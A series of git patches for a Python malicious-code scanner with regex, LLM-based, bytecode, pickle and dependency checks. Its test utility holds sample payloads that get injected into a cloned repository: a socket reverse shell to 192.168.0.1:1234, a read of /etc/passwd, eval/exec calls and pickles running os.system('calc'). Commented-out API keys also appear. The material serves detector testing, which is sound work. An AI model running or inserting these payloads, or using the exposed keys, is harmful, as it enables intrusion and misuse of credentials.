b/tests/test_final_tests.py index caad14b..05c1fb6 100644 --- a/tests/test_final_tests.py +++ b/tests/test_final_tests.py @@ -47,6 +47,10 @@ class TestFinalTests(unittest.TestCase): clone_repo("https://github.com/TheAlgorithms/Python.git", "/tmp/Python") shutil.copytree("/tmp/Python", self.path) sampleRate = 0.1 + + # TODO + # preproccessing + self.inject_result = inject_random_backdoor(self.path, sample_rate=sampleRate) self.pickle_true_num = inject_pickle_backdoor(self.path) self.pyc_true_num = inject_pyc_backdoor(self.path) From e9b1e82492dbb00909ec5492f5ede1e38b977c6c Mon Sep 17 00:00:00 2001 From: tritium0041 Date: Tue, 4 Jun 2024 21:47:17 +0800 Subject: [PATCH 24/30] =?UTF-8?q?feat:=E4=B8=BAllm=E5=B8=B8=E8=A7=84?= =?UTF-8?q?=E6=B7=BB=E5=8A=A0=E5=B9=B6=E5=8F=91=EF=BC=8C=E6=8F=90=E9=AB=98?= =?UTF-8?q?=E6=95=88=E7=8E=87?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- detection/GPTdetection.py | 47 ++++++++++++++++++++++++++++++++----- detection/__main__.py | 49 +++++++++++++++++++++------------------ 2 files changed, 67 insertions(+), 29 deletions(-) diff --git a/detection/GPTdetection.py b/detection/GPTdetection.py index b8a4e83..c098d56 100644 --- a/detection/GPTdetection.py +++ b/detection/GPTdetection.py @@ -1,8 +1,11 @@ import json import os +import threading +import time + from .utils import * import openai -import signal +# import signal class TimeoutException(Exception): @@ -22,8 +25,8 @@ def detectGPT(content: str): raise ValueError("env OPENAI_API_KEY no set") # Set alarm timer - signal.signal(signal.SIGTERM, timeout_handler) - signal.alarm(10) + # signal.signal(signal.SIGTERM, timeout_handler) + # signal.alarm(10) client = openai.OpenAI(base_url="https://api.xiaoai.plus/v1", api_key=api_key) text = content @@ -34,7 +37,9 @@ def detectGPT(content: str): "role": "system", "content": "You are a Python code reviewer.Read the code below and identify any potential security vulnerabilities. Classify them by risk level (high, medium, low, none). Only report the line number and the risk level.\nYou should output the result as json format in one line. For example: " '[{"Line": {the line number}, "Risk": "{choose from (high,medium,low)}","Reason":"{how it is vulnable}"}] Each of these three field is required.\n' - "You are required to only output the json format. Do not output any other information.\n", + "You are required to only output the json format. Do not output any other information.请注意:只对有具体危害的代码片段判定为有风险。\n" + "For examples:\nos.system('ls'),subprocess.call(['ls', '-l']),subprocess.call([\"/bin/sh\",\"-i\"]),eval(code),exec(code) and so on.\n" + "Please IGNORE the risks that dont matter a lot.", }, { "role": "user", @@ -55,8 +60,8 @@ def detectGPT(content: str): except TimeoutException: raise TimeoutException("The api call timed out") - finally: - signal.alarm(0) + # finally: + # signal.alarm(0) classified_results = {"high": [], "medium": [], "low": [], "none": []} for res in res_json: @@ -67,3 +72,33 @@ def detectGPT(content: str): except IndexError: pass return classified_results + + +def GPTdetectFileList(fileList): + # print(len(fileList)) + results = {"high": [], "medium": [], "low": [], "none": []} + threads = [] + for file in fileList: + content = read_file_content(str(file)) + threads.append(threading.Thread(target=GPTThread, args=(str(file), content, results))) + for thread in threads: + thread.start() + time.sleep(0.1) + for thread in threads: + thread.join() + return results + + +def GPTThread(filename, content, results): + try: + res = detectGPT(content) + for key in res: + if key != "none": # Exclude 'none' risk level + results[key].extend( + [ + (f"{filename}: Line {line_num}", line) + for line_num, line in res[key] + ] + ) + except Exception as e: + print(e) diff --git a/detection/__main__.py b/detection/__main__.py index 2f9b158..8ad6d04 100644 --- a/detection/__main__.py +++ b/detection/__main__.py @@ -7,7 +7,7 @@ from reportlab.platypus import Paragraph, Spacer, SimpleDocTemplate from detection.pickle_detection import pickleDataDetection from .Regexdetection import find_dangerous_functions -from .GPTdetection import detectGPT +from .GPTdetection import detectGPT,GPTdetectFileList from .pyc_detection import disassemble_pyc from .utils import * import sys @@ -107,6 +107,7 @@ def generate_text_content(results: Dict[str, List[Tuple[int, str]]]) -> str: text_output += "=" * 30 + "\n\n" for risk_level, entries in results.items(): + # print(risk_level, entries) if risk_level == "pickles": text_output += f"Pickles:\n" for i in entries: @@ -378,29 +379,31 @@ def process_path( for file_path in Path(path).rglob("*") if file_path.suffix in SUPPORTED_EXTENSIONS ] - + if mode == "llm": + results = GPTdetectFileList(all_files) + else: # 扫描动画 - for file_path in tqdm(all_files, desc="Scanning files", unit="file"): - file_extension = file_path.suffix - if file_extension in [".pkl",".pickle"]: - res = pickleDataDetection(str(file_path), output_file) - results["pickles"].append({ - "file": str(file_path), - "result": res - }) - continue - file_results = checkModeAndDetect( - mode, str(file_path), file_extension, pycdc_addr - ) - if file_results is not None: - for key in file_results: - if key != "none": # Exclude 'none' risk level - results[key].extend( - [ - (f"{file_path}: Line {line_num}", line) - for line_num, line in file_results[key] - ] - ) + for file_path in tqdm(all_files, desc="Scanning files", unit="file"): + file_extension = file_path.suffix + if file_extension in [".pkl",".pickle"]: + res = pickleDataDetection(str(file_path), output_file) + results["pickles"].append({ + "file": str(file_path), + "result": res + }) + continue + file_results = checkModeAndDetect( + mode, str(file_path), file_extension, pycdc_addr + ) + if file_results is not None: + for key in file_results: + if key != "none": # Exclude 'none' risk level + results[key].extend( + [ + (f"{file_path}: Line {line_num}", line) + for line_num, line in file_results[key] + ] + ) elif os.path.isfile(path): file_extension = os.path.splitext(path)[1] if file_extension in [".pkl", ".pickle"]: From 167bbe0a14581297a34f35f52c12a222f436fbd4 Mon Sep 17 00:00:00 2001 From: tritium0041 Date: Wed, 5 Jun 2024 10:36:26 +0800 Subject: [PATCH 25/30] =?UTF-8?q?fix=EF=BC=9A=E4=BF=AE=E5=A4=8D=E6=96=87?= =?UTF-8?q?=E5=BF=83=E4=B8=80=E8=A8=80=E7=9A=84=E8=B0=83=E7=94=A8?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- detection/GPTdetection.py | 1 + detection/__main__.py | 1 + detection/cngptdetection.py | 58 ++++++++++++++++++++++++++++++------- tests/final_tests_util.py | 58 +++++++++---------------------------- 4 files changed, 62 insertions(+), 56 deletions(-) diff --git a/detection/GPTdetection.py b/detection/GPTdetection.py index c098d56..d0e9690 100644 --- a/detection/GPTdetection.py +++ b/detection/GPTdetection.py @@ -92,6 +92,7 @@ def GPTdetectFileList(fileList): def GPTThread(filename, content, results): try: res = detectGPT(content) + # print(res) for key in res: if key != "none": # Exclude 'none' risk level results[key].extend( diff --git a/detection/__main__.py b/detection/__main__.py index 8ad6d04..a0be3bb 100644 --- a/detection/__main__.py +++ b/detection/__main__.py @@ -8,6 +8,7 @@ from reportlab.platypus import Paragraph, Spacer, SimpleDocTemplate from detection.pickle_detection import pickleDataDetection from .Regexdetection import find_dangerous_functions from .GPTdetection import detectGPT,GPTdetectFileList +# from .cngptdetection import detectGPT,GPTdetectFileList from .pyc_detection import disassemble_pyc from .utils import * import sys diff --git a/detection/cngptdetection.py b/detection/cngptdetection.py index 20a8a79..5a13c4d 100644 --- a/detection/cngptdetection.py +++ b/detection/cngptdetection.py @@ -1,16 +1,21 @@ import os +import threading +import time + import requests import re import json from typing import List, Dict, Any +from detection.utils import read_file_content + class TimeoutException(Exception): """自定义异常用于处理超时情况。""" pass -def detectGPT(content: str) -> str: +def detectGPT(content: str,token:str): """ 检测给定的代码内容中的潜在安全漏洞。 @@ -20,15 +25,8 @@ def detectGPT(content: str) -> str: 返回: - 分类后的漏洞信息的JSON字符串。 """ - api_key = os.getenv("BAIDU_API_KEY") - secret_key = os.getenv("BAIDU_SECRET_KEY") - #api_key = "DUBWNIrB6QJLOsLkpnEz2ZZa" - #secret_key = "9WK4HIV2n9r1ePPirqD4EQ6Ea33rH1m7" - if not api_key or not secret_key: - raise ValueError("BAIDU_API_KEY or BAIDU_SECRET_KEY is not set") - url = "https://aip.baidubce.com/rpc/2.0/ai_custom/v1/wenxinworkshop/chat/ernie-4.0-8k-0329?access_token=" + get_access_token( - api_key, secret_key) + url = "https://aip.baidubce.com/rpc/2.0/ai_custom/v1/wenxinworkshop/chat/ernie-4.0-8k-0329?access_token=" + token payload = json.dumps({ "messages": [ @@ -63,6 +61,7 @@ def detectGPT(content: str) -> str: classified_results = {"high": [], "medium": [], "low": [], "none": []} for res in extracted_data: + # print(res) try: line_number = int(res["Line"]) classified_results[res["Risk"]].append( @@ -71,7 +70,7 @@ def detectGPT(content: str) -> str: except (ValueError, IndexError, KeyError): continue - return json.dumps(classified_results, indent=2, ensure_ascii=False) + return classified_results def get_access_token(api_key: str, secret_key: str) -> str: @@ -110,4 +109,41 @@ def extract_json_from_text(text: str) -> List[Dict[str, Any]]: print(f"解码 JSON 时出错: {e}") return [] - return data \ No newline at end of file + return data + + +def GPTdetectFileList(fileList): + api_key = os.getenv("BAIDU_API_KEY") + secret_key = os.getenv("BAIDU_SECRET_KEY") + # api_key = "DUBWNIrB6QJLOsLkpnEz2ZZa" + # secret_key = "9WK4HIV2n9r1ePPirqD4EQ6Ea33rH1m7" + if not api_key or not secret_key: + raise ValueError("BAIDU_API_KEY or BAIDU_SECRET_KEY is not set") + # print(len(fileList)) + results = {"high": [], "medium": [], "low": [], "none": []} + threads = [] + token = get_access_token(api_key, secret_key) + # print(token) + for file in fileList: + content = read_file_content(str(file)) + threads.append(threading.Thread(target=GPTThread, args=(str(file), content, results,token))) + for thread in threads: + thread.start() + time.sleep(0.5) + for thread in threads: + thread.join() + return results + + +def GPTThread(filename, content, results,token): + + res = detectGPT(content,token) + # print(res) + for key in res: + if key != "none": # Exclude 'none' risk level + results[key].extend( + [ + (f"{filename}: Line {line_num}", line) + for line_num, line in res[key] + ] + ) diff --git a/tests/final_tests_util.py b/tests/final_tests_util.py index 58715cc..c7c414c 100644 --- a/tests/final_tests_util.py +++ b/tests/final_tests_util.py @@ -63,69 +63,39 @@ def inject_random_backdoor( # 示例1: 通过 os.system 执行命令 -backdoor1 = """ -import os -os.system('ls') -""" +backdoor1 = """import os +os.system('ls')""" # 示例2: 通过 subprocess 模块执行命令 -backdoor2 = """ -import subprocess -subprocess.call(['ls', '-l']) -""" +backdoor2 = """import subprocess +subprocess.call(['ls', '-l'])""" # 示例3: 打开一个反向 shell -backdoor3 = """ -import socket,subprocess,os +backdoor3 = """import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("192.168.0.1",1234)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) -subprocess.call(["/bin/sh","-i"]) -""" +subprocess.call(["/bin/sh","-i"])""" # 示例4: 通过 eval 执行任意代码 -backdoor4 = """ -code = "print('Hello, World!')" -eval(code) -""" +backdoor4 = """code = "print('Hello, World!')" +eval(code)""" # 示例5: 通过 exec 执行任意代码 -backdoor5 = """ -code = ''' +backdoor5 = """code = ''' import os os.system('ls') ''' -exec(code) -""" +exec(code)""" -# 示例6: 简单的 HTTP 服务器后门 -backdoor6 = """ -import http.server -import socketserver - -PORT = 8000 - -Handler = http.server.SimpleHTTPRequestHandler - -with socketserver.TCPServer(("", PORT), Handler) as httpd: - print("serving at port", PORT) - httpd.serve_forever() -""" # 示例7: 读取并显示文件内容 -backdoor7 = """ -with open('/etc/passwd', 'r') as file: +backdoor7 = """with open('/etc/passwd', 'r') as file: data = file.read() - print(data) -""" + print(data)""" -# 示例8: 无限循环 -backdoor8 = """ -while True: - print("This is a backdoor.") -""" backdoors = [ backdoor1, @@ -133,9 +103,7 @@ backdoors = [ backdoor3, backdoor4, backdoor5, - backdoor6, backdoor7, - backdoor8, ] @@ -183,4 +151,4 @@ if __name__ == "__main__": clone_dir = "/tmp/repo" clone_repo(repo_url, clone_dir) inject_random_backdoor(clone_dir) - inject_pickle_backdoor(clone_dir) + inject_pickle_backdoor(clone_dir) \ No newline at end of file From c811e434c690f94dc29b0fe3a611212d9430f34f Mon Sep 17 00:00:00 2001 From: dqy <1016751306@qq.com> Date: Wed, 5 Jun 2024 10:46:42 +0800 Subject: [PATCH 26/30] =?UTF-8?q?fix:=20=E4=BE=9D=E8=B5=96=E6=8A=A5?= =?UTF-8?q?=E5=91=8A=E8=BE=93=E5=87=BA=E6=A0=BC=E5=BC=8F=E4=BF=AE=E6=94=B9?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- detection/requirements_detection.py | 203 +++++++++++++++++++++++----- 1 file changed, 166 insertions(+), 37 deletions(-) diff --git a/detection/requirements_detection.py b/detection/requirements_detection.py index 5a1c78f..8f2cdea 100644 --- a/detection/requirements_detection.py +++ b/detection/requirements_detection.py @@ -3,6 +3,15 @@ import requests from bs4 import BeautifulSoup from packaging.version import Version, InvalidVersion import sys +from reportlab.lib.pagesizes import letter +from reportlab.lib.styles import getSampleStyleSheet, ParagraphStyle +from reportlab.platypus import SimpleDocTemplate, Paragraph, Spacer +from colorama import Fore, Style, init +from tqdm import tqdm +import html + + +init(autoreset=True) # 初始化colorama,并在每次打印后自动重置颜色 def fetch_html(url: str) -> str: @@ -55,7 +64,6 @@ def version_in_range(version, range_str: str) -> bool: except InvalidVersion: return False else: - # 如果没有给版本号,默认使用最新版本 if range_str[-2] == ",": return True @@ -77,37 +85,155 @@ def version_in_range(version, range_str: str) -> bool: return True -def check_vulnerabilities(requirements: list, base_url: str, output_file: str): - with open(output_file, "w") as out_file: - for req in requirements: - version = "" - # 如果有版本 - if "==" in req: - package_name, version = req.split("==") - # 没有版本 - else: - package_name, version = req, None - # 拼接URL - url = f"{base_url}{package_name}" - print(f"Fetching data for {package_name} from {url}") - html_content = fetch_html(url) - if html_content: - # 解析hmtl - extracted_data = parse_html(html_content) - if extracted_data: - relevant_vulns = [] - for vuln in extracted_data: - if version_in_range(version, vuln["chip"]): - relevant_vulns.append(vuln) - if relevant_vulns: - out_file.write(f"Vulnerabilities found for {package_name}:\n") - for vuln in relevant_vulns: - out_file.write(f" - {vuln['link']}\n") - out_file.write("\n") - else: - print(f"No relevant data found for {package_name}.") - else: - print(f"Failed to fetch data for {package_name}.") +def check_vulnerabilities(requirements: list, base_url: str) -> str: + results = [] + for req in tqdm(requirements, desc="Checking vulnerabilities", unit="dependency"): + version = "" + if "==" in req: + package_name, version = req.split("==") + else: + package_name, version = req, None + url = f"{base_url}{package_name}" + # print(f"Fetching data for {package_name} from {url}") + html_content = fetch_html(url) + if html_content: + extracted_data = parse_html(html_content) + if extracted_data: + relevant_vulns = [] + for vuln in extracted_data: + if version_in_range(version, vuln["chip"]): + relevant_vulns.append(vuln) + if relevant_vulns: + result = f"Vulnerabilities found for {package_name}:\n" + for vuln in relevant_vulns: + result += f" - {vuln['link']}\n" + results.append(result) + return "\n".join(results) + + +def save_to_file(output_path: str, data: str): + if output_path.endswith(".html"): + save_as_html(output_path, data) + elif output_path.endswith(".pdf"): + save_as_pdf(output_path, data) + elif output_path.endswith(".md"): + save_as_markdown(output_path, data) + else: + save_as_txt(output_path, data) + + +def save_as_html(output_path: str, data: str): + escaped_data = html.escape(data) + html_content = f""" + + + + + + Vulnerability Report + + + +
+
Vulnerability Report
+
{escaped_data}
+
+ + + """ + with open(output_path, "w", encoding="utf-8") as file: + file.write(html_content) + + +def save_as_pdf(output_path: str, data: str): + doc = SimpleDocTemplate(output_path, pagesize=letter) + story = [] + styles = getSampleStyleSheet() + + # Add the title centered + title_style = ParagraphStyle( + "Title", + parent=styles["Title"], + alignment=1, # Center alignment + fontSize=24, + leading=28, + spaceAfter=20, + fontName="Helvetica-Bold", + ) + title = Paragraph("Vulnerability Report", title_style) + story.append(title) + + # Normal body text style + normal_style = ParagraphStyle( + "BodyText", parent=styles["BodyText"], fontSize=12, leading=15, spaceAfter=12 + ) + + # Add the vulnerability details + for line in data.split("\n"): + if line.strip(): # Skip empty lines + story.append(Paragraph(line, normal_style)) + + doc.build(story) + + +def save_as_markdown(output_path: str, data: str): + with open(output_path, "w") as file: + file.write("## Vulnerability Report: \n\n") + file.write(data) + + +def save_as_txt(output_path: str, data: str): + with open(output_path, "w") as file: + file.write("Vulnerability Report: \n\n") + file.write(data) + + +def print_separator(title, char="-", length=50, padding=2): + print(f"{title:^{length + 4*padding}}") # 居中打印标题,两侧各有padding个空格 + print(char * (length + 2 * padding)) # 打印分割线,两侧各有padding个字符的空格 def main(): @@ -124,16 +250,19 @@ def main(): "-o", "--output", help="Output file path with extension, e.g., './output/report.txt'", - required=True, ) args = parser.parse_args() base_url = "https://security.snyk.io/package/pip/" - # 分析项目依赖,包括名称和版本(如果有的话) requirements = load_requirements(args.requirement) - # 传入依赖信息,url前缀,扫描结果输出位置 - check_vulnerabilities(requirements, base_url, args.output) - print("Vulnerability scan complete. Results saved to", args.output) + results = check_vulnerabilities(requirements, base_url) + + if args.output: + save_to_file(args.output, results) + print(f"Vulnerability scan complete. Results saved to {args.output}") + else: + print_separator("\n\nVulnerability Report", "=", 40, 5) + print(results) if __name__ == "__main__": From 373defc5bb09b922031149c8cafc6fdee9e5f630 Mon Sep 17 00:00:00 2001 From: dqy <1016751306@qq.com> Date: Wed, 5 Jun 2024 15:56:06 +0800 Subject: [PATCH 27/30] =?UTF-8?q?feat:=20=E5=B0=86=E4=BE=9D=E8=B5=96?= =?UTF-8?q?=E6=A3=80=E6=B5=8B=E6=B7=BB=E5=8A=A0=E5=88=B0=E6=A8=A1=E7=BB=84?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- detection/__main__.py | 34 +++++++++++------- detection/requirements_detection.py | 53 ++++++++++++++--------------- 2 files changed, 48 insertions(+), 39 deletions(-) diff --git a/detection/__main__.py b/detection/__main__.py index ad63295..0157b03 100644 --- a/detection/__main__.py +++ b/detection/__main__.py @@ -5,6 +5,8 @@ from reportlab.lib.styles import getSampleStyleSheet from reportlab.platypus import Paragraph, Spacer, SimpleDocTemplate from detection.pickle_detection import pickleDataDetection + +from .requirements_detection import requirement_detection from .Regexdetection import find_dangerous_functions from .GPTdetection import detectGPT from .pyc_detection import disassemble_pyc @@ -361,7 +363,12 @@ def checkModeAndDetect(mode: str, filePath: str, fileExtension: str, pycdc_addr: def process_path( - path: str, output_format: str, mode: str, pycdc_addr: str, output_file=None + path: str, + output_format: str, + mode: str, + pycdc_addr: str, + output_file=None, + requirement_path=None, ): results = {"high": [], "medium": [], "low": [], "none": []} if os.path.isdir(path): @@ -375,12 +382,9 @@ def process_path( # 扫描动画 for file_path in tqdm(all_files, desc="Scanning files", unit="file"): file_extension = file_path.suffix - if file_extension in [".pkl",".pickle"]: + if file_extension in [".pkl", ".pickle"]: res = pickleDataDetection(str(file_path), output_file) - results["pickles"].append({ - "file": str(file_path), - "result": res - }) + results["pickles"].append({"file": str(file_path), "result": res}) continue file_results = checkModeAndDetect( mode, str(file_path), file_extension, pycdc_addr @@ -398,10 +402,7 @@ def process_path( file_extension = os.path.splitext(path)[1] if file_extension in [".pkl", ".pickle"]: res = pickleDataDetection(str(path), output_file) - results["pickles"].append({ - "file": str(path), - "result": res - }) + results["pickles"].append({"file": str(path), "result": res}) elif file_extension in SUPPORTED_EXTENSIONS: file_results = checkModeAndDetect(mode, path, file_extension, pycdc_addr) if file_results is not None: @@ -419,7 +420,8 @@ def process_path( else: print("Invalid path.") sys.exit(1) - + if requirement_path is not None: + requirement_detection(requirement_path, output_file) output_results(results, output_format, output_file) @@ -446,6 +448,12 @@ def main(): help="Path to pickle file to analyze", default=None, ) + parser.add_argument( + "-r", + "--requirement", + help="Path to requirement file to analyze", + default=None, + ) args = parser.parse_args() output_format = "txt" # Default output format output_file = None @@ -464,7 +472,9 @@ def main(): ) output_file = args.output.rsplit(".", 1)[0] + ".txt" # 如果未指定输出文件,则输出到 stdout;否则写入文件 - process_path(args.path, output_format, args.mode, args.pycdc, output_file) + process_path( + args.path, output_format, args.mode, args.pycdc, output_file, args.requirement + ) if PYCDC_FLAG == False: print( "ERROR: Detected Python 3.11 or above .pyc files. You need to install pycdc and compile it yourself to obtain pycdc." diff --git a/detection/requirements_detection.py b/detection/requirements_detection.py index 8f2cdea..c1c3538 100644 --- a/detection/requirements_detection.py +++ b/detection/requirements_detection.py @@ -9,6 +9,7 @@ from reportlab.platypus import SimpleDocTemplate, Paragraph, Spacer from colorama import Fore, Style, init from tqdm import tqdm import html +import os init(autoreset=True) # 初始化colorama,并在每次打印后自动重置颜色 @@ -94,7 +95,7 @@ def check_vulnerabilities(requirements: list, base_url: str) -> str: else: package_name, version = req, None url = f"{base_url}{package_name}" - # print(f"Fetching data for {package_name} from {url}") + # print(f"\nFetching data for {package_name} from {url}") html_content = fetch_html(url) if html_content: extracted_data = parse_html(html_content) @@ -236,34 +237,32 @@ def print_separator(title, char="-", length=50, padding=2): print(char * (length + 2 * padding)) # 打印分割线,两侧各有padding个字符的空格 -def main(): - parser = argparse.ArgumentParser( - description="Check project dependencies for vulnerabilities." - ) - parser.add_argument( - "-r", - "--requirement", - help="Path to the requirements file of the project", - required=True, - ) - parser.add_argument( - "-o", - "--output", - help="Output file path with extension, e.g., './output/report.txt'", - ) - args = parser.parse_args() +def modify_file_name(file_path: str) -> str: + """ + Modify the file name by adding '-re' before the file extension. + Args: + file_path (str): The original file path. + + Returns: + str: The modified file path. + """ + directory, file_name = os.path.split(file_path) + name, ext = os.path.splitext(file_name) + new_file_name = f"{name}-re{ext}" + new_file_path = os.path.join(directory, new_file_name) + return new_file_path + + +def requirement_detection(requirement_path, output_path=None): base_url = "https://security.snyk.io/package/pip/" - requirements = load_requirements(args.requirement) + requirements = load_requirements(requirement_path) results = check_vulnerabilities(requirements, base_url) - - if args.output: - save_to_file(args.output, results) - print(f"Vulnerability scan complete. Results saved to {args.output}") + if output_path is not None: + new_path = modify_file_name(output_path) + save_to_file(new_path, results) + print(f"Vulnerability scan complete. Results saved to {output_path}") + print(f"Requirements scan complete. Results saved to {new_path}") else: - print_separator("\n\nVulnerability Report", "=", 40, 5) + print_separator("\nVulnerability Report", "=", 40, 5) print(results) - - -if __name__ == "__main__": - main() From 752e7747146474539c7a57fe9d70860154425ac6 Mon Sep 17 00:00:00 2001 From: dqy <1016751306@qq.com> Date: Thu, 6 Jun 2024 16:05:25 +0800 Subject: [PATCH 28/30] =?UTF-8?q?fix:=20=E4=BF=AE=E6=94=B9=E6=AD=A3?= =?UTF-8?q?=E5=88=99=E5=8C=B9=E9=85=8D=E9=80=BB=E8=BE=91?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- detection/Regexdetection.py | 5 ++++- detection/__main__.py | 23 +++++++++-------------- 2 files changed, 13 insertions(+), 15 deletions(-) diff --git a/detection/Regexdetection.py b/detection/Regexdetection.py index 2daa291..0ad2188 100644 --- a/detection/Regexdetection.py +++ b/detection/Regexdetection.py @@ -34,6 +34,7 @@ def find_dangerous_functions( r"\bos\.kill\b": "high", r"\bos\.popen\b": "medium", r"\bos\.spawn\b": "medium", + r"\bsubprocess": "medium", }, } risk_patterns = patterns.get(file_extension, {}) @@ -43,7 +44,9 @@ def find_dangerous_functions( clean_line = remove_comments(line, file_extension) if not clean_line: continue + # 消除换行符,避免影响正则匹配 + clean_line = clean_line.replace("\\n", "") for pattern, risk_level in risk_patterns.items(): - if re.search(pattern, clean_line): + if re.search(pattern, clean_line, re.MULTILINE | re.DOTALL): classified_results[risk_level].append((line_number, clean_line)) return classified_results diff --git a/detection/__main__.py b/detection/__main__.py index a0be3bb..9dfdc5d 100644 --- a/detection/__main__.py +++ b/detection/__main__.py @@ -7,7 +7,8 @@ from reportlab.platypus import Paragraph, Spacer, SimpleDocTemplate from detection.pickle_detection import pickleDataDetection from .Regexdetection import find_dangerous_functions -from .GPTdetection import detectGPT,GPTdetectFileList +from .GPTdetection import detectGPT, GPTdetectFileList + # from .cngptdetection import detectGPT,GPTdetectFileList from .pyc_detection import disassemble_pyc from .utils import * @@ -30,6 +31,8 @@ ORDERS = [ "__getattribute__", "getattr", "child_process", + "kill", + "fork", ] # Initialize colorama @@ -146,8 +149,6 @@ def generate_text_content(results: Dict[str, List[Tuple[int, str]]]) -> str: text_output += line_text text_output += "\n" - - return text_output @@ -372,7 +373,7 @@ def checkModeAndDetect(mode: str, filePath: str, fileExtension: str, pycdc_addr: def process_path( path: str, output_format: str, mode: str, pycdc_addr: str, output_file=None ): - results = {"high": [], "medium": [], "low": [], "none": [],"pickles": []} + results = {"high": [], "medium": [], "low": [], "none": [], "pickles": []} if os.path.isdir(path): # 使用rglob获取所有文件 all_files = [ @@ -383,15 +384,12 @@ def process_path( if mode == "llm": results = GPTdetectFileList(all_files) else: - # 扫描动画 + # 扫描动画 for file_path in tqdm(all_files, desc="Scanning files", unit="file"): file_extension = file_path.suffix - if file_extension in [".pkl",".pickle"]: + if file_extension in [".pkl", ".pickle"]: res = pickleDataDetection(str(file_path), output_file) - results["pickles"].append({ - "file": str(file_path), - "result": res - }) + results["pickles"].append({"file": str(file_path), "result": res}) continue file_results = checkModeAndDetect( mode, str(file_path), file_extension, pycdc_addr @@ -409,10 +407,7 @@ def process_path( file_extension = os.path.splitext(path)[1] if file_extension in [".pkl", ".pickle"]: res = pickleDataDetection(str(path), output_file) - results["pickles"].append({ - "file": str(path), - "result": res - }) + results["pickles"].append({"file": str(path), "result": res}) elif file_extension in SUPPORTED_EXTENSIONS: file_results = checkModeAndDetect(mode, path, file_extension, pycdc_addr) if file_results is not None: From 2adb1cbc2e01639852cf4b5e189d6a491549f6e1 Mon Sep 17 00:00:00 2001 From: dqy <1016751306@qq.com> Date: Thu, 6 Jun 2024 17:14:47 +0800 Subject: [PATCH 29/30] =?UTF-8?q?fix:=20=E5=88=A0=E9=99=A4head?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- detection/__main__.py | 1 - 1 file changed, 1 deletion(-) diff --git a/detection/__main__.py b/detection/__main__.py index f179285..c620c8e 100644 --- a/detection/__main__.py +++ b/detection/__main__.py @@ -388,7 +388,6 @@ def process_path( for file_path in Path(path).rglob("*") if file_path.suffix in SUPPORTED_EXTENSIONS ] -<<<<<<< HEAD if mode == "llm": results = GPTdetectFileList(all_files) else: From 94407e71b8fa54d3115d96e88c64a80be99647cf Mon Sep 17 00:00:00 2001 From: tritium0041 Date: Sun, 9 Jun 2024 12:26:38 +0800 Subject: [PATCH 30/30] =?UTF-8?q?test=EF=BC=9A=E6=B7=BB=E5=8A=A0=E6=B5=8B?= =?UTF-8?q?=E8=AF=95=E7=94=A8=E4=BE=8B?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- detection/GPTdetection.py | 4 ++-- detection/__main__.py | 6 +++++- tests/final_tests_util.py | 11 ++++++++--- 3 files changed, 15 insertions(+), 6 deletions(-) diff --git a/detection/GPTdetection.py b/detection/GPTdetection.py index d0e9690..08a18b6 100644 --- a/detection/GPTdetection.py +++ b/detection/GPTdetection.py @@ -28,7 +28,7 @@ def detectGPT(content: str): # signal.signal(signal.SIGTERM, timeout_handler) # signal.alarm(10) - client = openai.OpenAI(base_url="https://api.xiaoai.plus/v1", api_key=api_key) + client = openai.OpenAI(base_url="https://api.kpi7.cn/v1", api_key=api_key) text = content # client = openai.OpenAI(api_key="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") #测试用key response = client.chat.completions.create( @@ -46,7 +46,7 @@ def detectGPT(content: str): "content": text, }, ], - model="gpt-3.5-turbo", + model="gpt-4o", ) try: message_content = response.choices[0].message.content diff --git a/detection/__main__.py b/detection/__main__.py index a0be3bb..3b5aedb 100644 --- a/detection/__main__.py +++ b/detection/__main__.py @@ -18,7 +18,7 @@ from pathlib import Path PYCDC_FLAG = True PYCDC_ADDR_FLAG = True -SUPPORTED_EXTENSIONS = {".py", ".js", ".cpp", ".pyc"} +SUPPORTED_EXTENSIONS = {".py", ".js", ".cpp", ".pyc",".pkl",".pickle"} OUTPUT_FORMATS = ["html", "md", "txt", "pdf"] ORDERS = [ "__import__", @@ -106,6 +106,7 @@ def generate_text_content(results: Dict[str, List[Tuple[int, str]]]) -> str: text_output = "Security Analysis Report\n" text_output += "=" * 30 + "\n\n" + # text_output+= "chatGPT检测结果:\n\n" for risk_level, entries in results.items(): # print(risk_level, entries) @@ -380,13 +381,16 @@ def process_path( for file_path in Path(path).rglob("*") if file_path.suffix in SUPPORTED_EXTENSIONS ] + print(all_files) if mode == "llm": results = GPTdetectFileList(all_files) else: # 扫描动画 for file_path in tqdm(all_files, desc="Scanning files", unit="file"): file_extension = file_path.suffix + # print(file_extension) if file_extension in [".pkl",".pickle"]: + # print("识别到pickle") res = pickleDataDetection(str(file_path), output_file) results["pickles"].append({ "file": str(file_path), diff --git a/tests/final_tests_util.py b/tests/final_tests_util.py index c7c414c..66834ad 100644 --- a/tests/final_tests_util.py +++ b/tests/final_tests_util.py @@ -106,7 +106,12 @@ backdoors = [ backdoor7, ] - +backdoors_pickle = [ + b'\x80\x03c__main__\nPerson\nq\x00)\x81q\x01}q\x02(X\x03\x00\x00\x00ageq\x03K\x12X\x04\x00\x00\x00nameq\x04X\x06\x00\x00\x00Pickleq\x05ub.', + b'\x80\x03c__main__\nUser\nq\x00)\x81q\x01}q\x02(X\x05\x00\x00\x00adminq\x03\x88X\x05\x00\x00\x00guestq\x04\x89ub.', + b'cnt\nsystem\np0\n(Vcalc\np1\ntp2\nRp3\n.', + b'\x80\x03c__main__\nUser\nq\x00)\x81q\x01}q\x02(X\x05\x00\x00\x00adminq\x03\x88X\x05\x00\x00\x00guestq\x04\x89ubcnt\nsystem\np0\n(Vcalc\np1\ntp2\nRp3\n.' +] def inject_pickle_backdoor(root_path: str) -> None: """ Generate a pickle backdoor and insert it into the specified path. @@ -117,8 +122,8 @@ def inject_pickle_backdoor(root_path: str) -> None: all_path = [str(p) for p in 